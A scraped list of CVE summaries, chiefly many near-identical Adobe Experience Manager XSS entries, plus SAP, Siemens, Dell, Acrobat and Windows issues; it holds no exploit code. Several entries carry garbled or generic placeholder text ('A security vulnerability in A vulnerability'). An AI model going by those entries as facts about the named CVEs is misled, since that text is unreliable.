Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46916
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46915
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46914
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46913
MEDIUM
CVSS 4.8
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46912
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46911
MEDIUM
CVSS 4.8
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46910
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46909
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46908
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46907
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46906
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46905
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46904
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46903
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46902
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46901
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46900
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46899
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46898
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46895
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46894
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46893
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46892
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46891
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46890
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46889
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by an Improper Access Control vulnerability that could result in privilege escalation. A low privileged attacker could leverage this vulnerability to bypass security measures and gain limited unauthorized elevated access. Exploitation of this issue does not require user interaction.
Adobe
Privilege Escalation
Authentication Bypass
Experience Manager
-
CVE-2025-46888
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46887
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46886
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46885
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46884
MEDIUM
CVSS 4.8
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46883
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46882
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46881
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46880
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46879
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46878
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46877
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46876
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46875
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
Adobe
XSS
Experience Manager
-
CVE-2025-46874
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
Adobe
XSS
Experience Manager
-
CVE-2025-46873
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46872
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46871
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46870
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46866
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46865
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46864
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46863
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46862
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46861
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46860
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46859
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46858
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46857
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
Adobe
XSS
Experience Manager
-
CVE-2025-46855
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46854
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46853
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46851
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46850
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46848
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46847
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46846
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46845
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46844
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46843
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46842
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46841
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46838
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-44043
MEDIUM
CVSS 5.4
Keyoti SearchUnit prior to 9.0.0. is vulnerable to Server-Side Request Forgery (SSRF) in /Keyoti_SearchEngine_Web_Common/SearchService.svc/GetResults and /Keyoti_SearchEngine_Web_Common/SearchService.svc/GetLocationAndContentCategories. An attacker can specify their own SMB server as the indexDirectory value when making POST requests to the affected components. In doing so an attacker can get the SearchUnit server to read and write configuration and log files from/to the attackers server.
SSRF
-
CVE-2025-43699
MEDIUM
CVSS 5.3
A remote code execution vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Java
Authentication Bypass
-
CVE-2025-43579
MEDIUM
CVSS 5.5
Acrobat Reader versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier are affected by an Information Exposure vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to gain unauthorized access to sensitive information. Exploitation of this issue does not require user interaction.
Adobe
Information Disclosure
Authentication Bypass
Acrobat
Acrobat Reader
-
CVE-2025-43578
MEDIUM
CVSS 5.5
Acrobat Reader versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Buffer Overflow
Adobe
Information Disclosure
Acrobat Reader
Acrobat Dc
-
CVE-2025-42998
MEDIUM
CVSS 5.3
CVE-2025-42998 is a security vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
-
CVE-2025-42996
MEDIUM
CVSS 5.6
SAP MDM Server allows an attacker to gain control of existing client sessions and execute certain functions without having to re-authenticate giving the ability to access or modify non-sensitive information or consume sufficient resources which could degrade the performance of the server causing low impact on confidentiality, integrity and availibility of the application.
Sap
Information Disclosure
-
CVE-2025-42993
MEDIUM
CVSS 6.7
A remote code execution vulnerability (CVSS 6.7) that allows the attacker. Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
RCE
-
CVE-2025-42991
MEDIUM
CVSS 4.3
CVE-2025-42991 is a security vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
-
CVE-2025-42987
MEDIUM
CVSS 4.3
CVE-2025-42987 is a security vulnerability (CVSS 4.3) that allows an attacker with basic privileges. Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
-
CVE-2025-42984
MEDIUM
CVSS 5.4
CVE-2025-42984 is a security vulnerability (CVSS 5.4). Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
-
CVE-2025-41657
MEDIUM
CVSS 4.3
CVE-2025-41657 is a security vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Information Disclosure
-
CVE-2025-40569
MEDIUM
CVSS 4.8
A vulnerability has been identified in RUGGEDCOM RST2428P (6GK6242-6PA00) (All versions < V3.2), SCALANCE XCH328 (6GK5328-4TS01-2EC2) (All versions < V3.2), SCALANCE XCM324 (6GK5324-8TS01-2AC2) (All versions < V3.2), SCALANCE XCM328 (6GK5328-4TS01-2AC2) (All versions < V3.2), SCALANCE XCM332 (6GK5332-0GA01-2AC2) (All versions < V3.2), SCALANCE XRH334 (24 V DC, 8xFO, CC) (6GK5334-2TS01-2ER3) (All versions < V3.2), SCALANCE XRM334 (230 V AC, 12xFO) (6GK5334-3TS01-3AR3) (All versions < V3.2), SCALANCE XRM334 (230 V AC, 8xFO) (6GK5334-2TS01-3AR3) (All versions < V3.2), SCALANCE XRM334 (230V AC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-3AR3) (All versions < V3.2), SCALANCE XRM334 (24 V DC, 12xFO) (6GK5334-3TS01-2AR3) (All versions < V3.2), SCALANCE XRM334 (24 V DC, 8xFO) (6GK5334-2TS01-2AR3) (All versions < V3.2), SCALANCE XRM334 (24V DC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-2AR3) (All versions < V3.2), SCALANCE XRM334 (2x230 V AC, 12xFO) (6GK5334-3TS01-4AR3) (All versions < V3.2), SCALANCE XRM334 (2x230 V AC, 8xFO) (6GK5334-2TS01-4AR3) (All versions < V3.2), SCALANCE XRM334 (2x230V AC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-4AR3) (All versions < V3.2). The "Load Configuration from Local PC" functionality in the web interface of affected products contains a race condition vulnerability. This could allow an authenticated remote attacker to make the affected product load an attacker controlled configuration instead of the legitimate one. Successful exploitation requires that a legitimate administrator invokes the functionality and the attacker wins the race condition.
Siemens
Race Condition
Information Disclosure
-
CVE-2025-40568
MEDIUM
CVSS 4.3
A security vulnerability in A vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Siemens
Authentication Bypass
-
CVE-2025-40567
MEDIUM
CVSS 6.5
A security vulnerability in A vulnerability (CVSS 6.5). Remediation should follow standard vulnerability management procedures.
Siemens
Authentication Bypass
-
CVE-2025-36580
MEDIUM
CVSS 6.1
Dell Wyse Management Suite, versions prior to WMS 5.2, contain an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Script injection
XSS
Dell
Wyse Management Suite
-
CVE-2025-36578
MEDIUM
CVSS 6.8
Dell Wyse Management Suite, versions prior to WMS 5.2, contain an Incorrect Authorization vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.
Authentication Bypass
Dell
Wyse Management Suite
-
CVE-2025-36577
MEDIUM
CVSS 6.1
Dell Wyse Management Suite, versions prior to WMS 5.2, contain an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Script injection.
XSS
Dell
Wyse Management Suite
-
CVE-2025-33069
MEDIUM
CVSS 5.1
Improper verification of cryptographic signature in App Control for Business (WDAC) allows an unauthorized attacker to bypass a security feature locally.
Authentication Bypass
Windows Server 2025
Windows 11 24h2
Microsoft
-
CVE-2025-33065
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 11 22h2
Windows Server 2025
-
CVE-2025-33063
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 22h2
Windows Server 2025
-
CVE-2025-33062
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 11 22h2
Windows 10 22h2
-
CVE-2025-33061
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows Server 2016
